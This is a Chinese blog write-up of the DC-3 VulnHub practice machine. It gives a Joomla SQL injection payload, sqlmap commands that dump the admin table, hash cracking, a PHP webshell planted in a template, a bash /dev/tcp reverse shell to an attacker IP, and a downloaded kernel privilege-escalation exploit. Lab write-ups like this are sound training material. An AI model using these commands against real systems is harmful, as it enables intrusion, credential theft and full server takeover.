DC-3靶机渗透实战

最新推荐文章于 2024-05-12 16:42:38 发布
最新推荐文章于 2024-05-12 16:42:38 发布
阅读量2.6k 收藏 4
点赞数 2
分类专栏: DC 文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/blackhackerzxcr/article/details/106691500
版权

DC-3靶机渗透

咱们速战速决!我尽量详细一点
打开靶机,nat模式,nmap主机发现,全扫描
在这里插入图片描述
80端口,joomla 框架,打开御剑扫描器扫到后台路径和README.txt文件
获得了版本
在这里插入图片描述
这个版本有个sql注入漏洞,直接找来payload验证一下
index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)
在这里插入图片描述确实存在注入漏洞
直接上sqlmap
sqlmap -u "http://192.168.206.143/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=*
" --risk 3 --level 5 --dbs
拿到管理员账号:
sqlmap -u “http://192.168.206.143/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=*” --risk 3 -D joomladb -T “#__users” -C username,password --dump
在这里插入图片描述
这里我测试一下,还有另一种方法,我们数据库所在的账号是dba,直接写一句话木马
这里用hash爆破一下口令,把加密的hash串保存成txt文件,然后kali自带的john,输入命令john 文件名
爆破出来为snoopy,???????????????
然后登陆后台
在这里插入图片描述
找到Protostar 这个模板,然后进去改index.php文件内容,当然你随便改哪个php文件都可,加入一句话
在这里插入图片描述
保存,并退出,这里我刚开始上了一个get的,菜刀蚁剑怎么都连不上,后面我换了一个post就可以了
在这里插入图片描述
验证一下,然后蚁剑连
cmd下
反弹shell
bash -c ‘sh -i &>/dev/tcp/192.168.206.128/4444 0>&1’
用nc均没有成功,就这个可以
然后连上去了,发现是网站用户,各种suid提权没成功,发现内核版本为ubentu16. 内核4.4
用内核提权
提权exp
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

解压里面的exploit压缩包,用另一个压缩包没成功
然后把doubleput.c本地编译成二进制文件,把所有文件都上传到服务器
先授权给sh脚本
在这里插入图片描述
记得把所有的.c文件都上传,除了doubleput.c,上传编译好的脚本
在这里插入图片描述成功读取flag文件

在这里插入图片描述

最近在忙自己的博客,没学过node.js,感觉配置起来好难,弄好了,写一个搭建指南吧!

0XAXSDD
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
渗透测试靶机DC-3
prettyX的博客
11-30 846
goGoGO!!! 今天我们做DC-3。 : ) 0X00 环境准备 靶机下载地址:http://www.five86.com 攻击机 :Kali 可能会问靶机导入情况,这里有个小插曲,我们下面再说... 0X01 开始渗透 局域网主机发现 nmap获取信息 发现只开放了80端口,我们尝试访问,但是显示页面错误,和其他大佬的wp也不一致,经过判断,应...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
靶机渗透DC-3
weixin_44801963的博客
11-01 262
文章目录一、环境准备KaliDC-3二、渗透步骤1、信息收集2、漏洞探测3、漏洞利用1、SQL注入漏洞利用2、任意文件执行漏洞4、权限提升5、Get flag三、Have Fun 一、环境准备 Kali DC-3 下载官网:https://www.five86.com/ 二、渗透步骤 1、信息收集 主机发现 目标端口扫描 访问80服务 网站指纹识别 Joomla CMS扫描 扫除管理员登录界面 . 2、漏洞探测 查询 joomla 3.7.0已知的漏洞 3、漏洞利用 1、SQL注入漏洞利用
最新看完这篇 教你玩转渗透测试靶机vulnhub——DC3_vulnhub dc3(2),2024年最新值得一读
最新发布
2401_84563354的博客
05-12 993
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。从靶机DC-3开始,只有一个最终的flag,只有拿到root权限才可以发现最终的flag。
DC-3靶机
m0_57954651的博客
10-01 1857
保存就上传 然后进行测试访问 (再根据joomla的特性 模块会单独放在一个文件夹里/templates/ 而beez3模块就在/templates/beez3/里面 刚才创建的webshell路径为)http://192.168.47.150/templates/beez3/shell.php。文本写的是漏洞产生的原因 描述和漏洞利用的方法 还附上了exp 最后一行的连接 (执行下两个文件 Linux系统下.(点)是执行某个文件的意思 (./compile.sh)
DC-3靶机渗透
weixin_45442394的博客
06-14 681
1 获取ip 开机前一直按shift或Esc键 ro recovery nomodeset改为quiet splash rw init=/bin/bash 更改后按F10 重启虚拟机 2 端口扫描 3 服务确认 4 网站目录扫描 5 查看页面 joomscan扫描 joomscan --url http://192.168.182.139 -ec 查看版本漏洞 查看文档 6 SQL注入 数据库名 sqlmap -u “http://192.168.182.139/index.php?o
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
DC3靶机
PigLL的博客
08-11 440
## 关于DC3 靶机实验 1.信息收集: 2.网站信息 在浏览器中访问DC3的IP 利用工具kali中的nikto做一个简单的信息识别 通过扫描可以看到一些目录 然后通过浏览器可以访问 然后利用joomla专用的扫描工具joomscan扫描 发现了joomla的版本和一些目录 通过kali中的工具searchsploit扫描joomla 3.7.0版本存在的漏洞 通过扫描发现了一个42033.txt文件 通过searchsploit 将42033文件下载到当前目录 查看42033文件 发现
靶机DC-3—WP
m0_66638011的博客
05-17 1350
DC系列靶机是一系列专门为渗透测试和网络安全实验室设计的虚拟机器。这些靶机提供了一系列不同的漏洞和攻击场景,使渗透测试者可以在这些环境下测试自的技能和工具。DC系列靶机包含多个不同的主题,例如各种操作系统的漏洞,Web应用程序安全和无线网络安全等。它们对初学者和专业人士都有很大的价值,因为它们可以帮助他们了解安全漏洞和如何利用它们进行渗透测试。
渗透测试:DC-3靶机
Ciyaso的博客
08-16 464
零、修改网卡 扫不到iP需要修改网卡 打卡DC-3时进入这个界面按e键 然后找到g–root 将其后面的值从ro改成rw signie init=/bin/bash 按下Ctrl键+X键进入命令行 查看当前网卡IP信息 ip a,网卡名ens33 编辑网卡配置文件vim /etc/network/interfaces 重启网卡服务/etc/init.d/networking restart,再看看ip a 发现已有ip 一、扫描获取靶机ip arp-scan -l 192.168.203.1
CTF靶机 DC-3
weixin_52221158的博客
09-02 852
CTF靶场 DC-3详细讲解
渗透测试学习之靶机DC-3
xdbzdgx的博客
11-12 4617
1.下载靶机 本篇文章是DC靶机系列的第三篇,针对的是靶机DC-3,建议感兴趣的读者从DC-1开始练习,详细内容可以看我之前的文章。 DC-3的下载地址为DC: 3.2 ~ VulnHub。三个地址建议使用磁力下载,比较快。下载后解压为.ova文件,该格式可直接在VMware上打开,如果显示打开失败,点击重试即可成功,如果仍无法成功可百度、谷歌解决。 需要说明的是DC-3相较前两个靶机,它只有一个flag,便是最后一个flag,没有多余的提示了。 在VMware加载成功之后显示如下界面: 默.
DC-3 靶机详解
TonyChaoWei的博客
02-11 1111
DC-3靶机
DC-3靶机攻略
weixin_47311099的博客
07-16 442
DC-3攻略 信息收集 主机发现 nmap -sP 192.168.64.0/24 -oN nmap.sP 端口扫描 nmap -A 192.168.64.137 -p 1-65535 -oN NMAP_A 发现开放80端口 访问80 漏洞利用 安装joomla扫描工具joomscan apt-get install joomscan 查找cms版本漏洞 searchsploit Joomla 3.7.0 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-WEXzKK0O-
DC系列:3(DC-3靶机,初级渗透详细教程)
jrdh的博客
11-30 1478
DC-3靶机渗透环境搭建详情描述使用工具一:信息收集0x01 查看存活主机0x02查看开放端口0x03 查看端口服务0x04 下载joomscan0x05查看joomscan版本信息二:漏洞发现查看版本漏洞漏洞利用方法一:sql注入查库名查表名查列名查找字段信息方法二:使用joomblah脚本下载 joomblah.py 脚本执行joomblah获得密码密文破解加密0x01 保存密文文件0x02 识别hash类型并破解0x03 写入一句话木马0x04 蚁剑直连0x05 反弹shell四:提权0x01 查看版
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0XAXSDD

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值